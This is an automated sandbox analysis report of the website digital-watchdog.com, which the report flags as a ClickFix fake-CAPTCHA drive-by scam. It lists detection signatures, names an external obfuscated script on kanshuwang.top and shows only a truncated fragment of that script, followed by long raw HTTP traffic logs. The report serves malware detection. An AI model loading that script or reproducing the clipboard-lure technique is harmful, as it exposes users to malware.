Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://digital-watchdog.com

Overview

General Information

Sample URL:http://digital-watchdog.com
Analysis ID:1702450
Infos:

Detection

CAPTCHA Scam ClickFix
Score:64
Range:0 - 100
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
HTML page adds supicious text to clipboard
HTML page contains obfuscated javascript
HTML page contains hidden javascript code
HTTP GET or POST without a user agent

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,17587528478964095806,11073304561506859187,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1964 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2028,i,17587528478964095806,11073304561506859187,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6172 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5944 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://digital-watchdog.com" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No reasoning have been found
No configs have been found
SourceRuleDescriptionAuthorStrings
0.5.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 0.5.pages.csv, type: HTML
    Source: https://kanshuwang.top/ls/tracker.jsHTTP Parser: (function(_0x56c4d6,_0x1184e4){const _0x47dcd9=_0x11e7,_0x1961fe=_0x56c4d6();while(!![]){try{const _
    Source: https://digital-watchdog.com/HTTP Parser: Base64 decoded: 0jEtgjF8jFxb4bumtsdWGg==
    Source: https://digital-watchdog.com/HTTP Parser: No favicon
    Source: https://digital-watchdog.com/HTTP Parser: No favicon
    Source: https://digital-watchdog.com/HTTP Parser: No favicon
    Source: https://digital-watchdog.com/HTTP Parser: No favicon
    Source: https://digital-watchdog.com/HTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49774 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49784 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49785 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.16:49786 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.140.254:443 -> 192.168.2.16:49787 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.42.254:443 -> 192.168.2.16:49788 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49789 version: TLS 1.2
    Source: chrome.exeMemory has grown: Private usage: 1MB later: 38MB
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=767361503973632&ev=SubscribedButtonClick&dl=https%3A%2F%2Fdigital-watchdog.com%2F&rl=&if=false&ts=1748615725161&cd[buttonFeatures]=%7B%22classList%22%3A%22peer%20dark%3Abg-input%2F30%20data-%5Bstate%3Dchecked%5D%3Atext-primary-foreground%20dark%3Adata-%5Bstate%3Dchecked%5D%3Abg-primary%20focus-visible%3Aborder-ring%20focus-visible%3Aring-ring%2F50%20aria-invalid%3Aring-destructive%2F20%20dark%3Aaria-invalid%3Aring-destructive%2F40%20aria-invalid%3Aborder-destructive%20size-4%20shrink-0%20shadow-xs%20transition-shadow%20outline-none%20focus-visible%3Aring-%5B3px%5D%20disabled%3Acursor-not-allowed%20disabled%3Aopacity-50%20bg-white%20rounded-%5B2px%5D%20border-%5B2px%5D%20border-gray-500%20w-%5B18px%5D%20h-%5B18px%5D%20data-%5Bstate%3Dchecked%5D%3Abg-white%20data-%5Bstate%3Dchecked%5D%3Aborder-gray-500%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22button%22%2C%22type%22%3A%22button%22%2C%22name%22%3A%22%22%2C%22value%22%3A%22on%22%7D&cd[buttonText]=&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Digital%20Watchdog%20l%20Welcome%22%7D&sw=1280&sh=1024&v=2.9.203&r=stable&ec=1&o=12318&fbp=fb.1.1748615719969.679263426248015277&ler=empty&cdl=API_unavailable&it=1748615719584&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1host: www.facebook.comsec-ch-ua-platform: "Windows"
    Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
    Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /css/bootstrap-datepicker.css?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /library/jquery-toast/dist/toastr.min.css?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /library/Cookie-Alert/cookiealert.css?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /css/style.css?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /css/custom-style.css?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /css/dw.css?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /assets/20220503113243-img-246952568.svg HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /css/new-homepage.css HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /assets/dw-topnav-logo.png HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /ls/tracker.js HTTP/1.1Host: kanshuwang.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.3.1/css/bootstrap.min.css HTTP/1.1host: stackpath.bootstrapcdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
    Source: global trafficHTTP traffic detected: GET /npm/slick-carousel@1.8.1/slick/slick.css HTTP/1.1host: cdn.jsdelivr.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
    Source: global trafficHTTP traffic detected: GET /gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css HTTP/1.1host: cdn.jsdelivr.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
    Source: global trafficHTTP traffic detected: GET /aos@2.3.4/dist/aos.css HTTP/1.1host: unpkg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
    Source: global trafficHTTP traffic detected: GET /ajax/libs/bootstrap-tagsinput/0.8.0/bootstrap-tagsinput.css HTTP/1.1host: cdnjs.cloudflare.comorigin: https://digital-watchdog.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: styleaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
    Source: global trafficHTTP traffic detected: GET /releases/v5.8.1/css/all.css HTTP/1.1host: use.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/top_nav_icon1.jpg HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/top_nav_icon2.jpg HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/top_nav_icon3.jpg HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /ajax/libs/bootstrap-tagsinput/0.8.0/bootstrap-tagsinput.js HTTP/1.1host: cdnjs.cloudflare.comorigin: https://digital-watchdog.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
